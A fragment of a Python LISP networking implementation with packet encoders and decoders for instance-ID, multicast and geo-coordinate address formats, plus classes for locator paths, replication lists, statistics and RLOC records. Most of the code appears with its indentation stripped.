if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate that there are enough bytes
# remaining in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and group address. Validate that there are enough bytes
# remaining in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = group.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
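#
# lisp_address_usage_sketch
#
# Illustrative sketch only -- not called anywhere in this file. It parses
# an EID-prefix and a host EID, then exercises the longest-match test the
# caches depend on. Note the instance-IDs must match for is_more_specific()
# to succeed.
#
def lisp_address_usage_sketch():
    prefix = lisp_address(LISP_AFI_NONE, "", 0, 0)
    prefix.store_prefix("[1000]10.0.0.0/8")
    host = lisp_address(LISP_AFI_NONE, "", 0, 0)
    host.store_address("[1000]10.1.1.1")
    assert host.is_more_specific(prefix)
    assert host.is_private_address()
    return(prefix.print_prefix())
#enddef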
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# it the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
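#
# lisp_elp_usage_sketch
#
# Illustrative sketch only -- not called anywhere in this file. It builds
# a two-hop explicit locator path and prints it. Each hop renders with
# three flag letters for the eid, probe, and strict flags; with default
# flags the output is "1.1.1.1(Rps), 2.2.2.2(Rps)".
#
def lisp_elp_usage_sketch():
    elp = lisp_elp("example-path")
    for addr_str in ["1.1.1.1", "2.2.2.2"]:
        elp_node = lisp_elp_node()
        elp_node.address.store_address(addr_str)
        elp.elp_nodes.append(elp_node)
    #endfor
    return(elp.print_elp(False))
#enddef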
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == None or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
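#
# lisp_geo_usage_sketch
#
# Illustrative sketch only -- not called anywhere in this file. It parses
# a geo-prefix of the form <lat>-<mins>-<secs>-<N|S>-<lon>-<mins>-<secs>-
# <W|E>[/<radius-km>] and converts it to decimal degrees. Remember the
# internal sign convention above: north latitudes and east longitudes are
# stored negative, while dms_to_decimal() returns the usual geographic
# convention (north positive, west negative).
#
def lisp_geo_usage_sketch():
    geo = lisp_geo("example")
    assert geo.parse_geo_string("37-23-30-N-121-57-52-W/10")
    lat, lon = geo.dms_to_decimal()
    assert lat > 0 and lon < 0
    return(geo.print_geo())
#enddef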
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = blue(rle_node.rloc_name, html) if \
rle_node.rloc_name != None else ""
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else "-" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
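    #
    # Illustrative normalize() outputs, derived from the slicing logic
    # above (a sketch, not executed anywhere): 1234567 -> "1.2M",
    # 1234567890 -> "1.23B", 1234567890123 -> "123.456T".
    #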
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and error stats. Anytime a new
# lisp_packet.packet_error value is added, this dictionary needs a matching
# key string added here.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
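#
# Illustrative use (a sketch, not called from here): the decap path indexes
# this table by the packet_error string and bumps the counters, e.g.:
#
#   lisp_decap_stats["ICV-error"].increment(len(packet))
#
# A packet_error value with no matching key would raise KeyError, hence the
# note above about keeping the two in sync.
#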
#
# This is a locator record definition as defined in the LISP RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
            hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
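        #
        # Example of the resulting chain (assuming two default routes,
        # ("eth0", "10.0.0.1") and ("eth1", "10.0.1.1")): self RLOC-probes
        # via the first tuple and self.next_rloc, a deep copy of self,
        # probes via the second.
        #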
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
        if (self.state == LISP_RLOC_UNKNOWN_STATE):
            return("unknown-state")
        if (self.state == LISP_RLOC_UP_STATE):
            return("up-state")
        if (self.state == LISP_RLOC_DOWN_STATE):
            return("down-state")
        if (self.state == LISP_RLOC_ADMIN_DOWN_STATE):
            return("admin-down-state")
        if (self.state == LISP_RLOC_UNREACH_STATE):
            return("unreach-state")
        if (self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE):
            return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
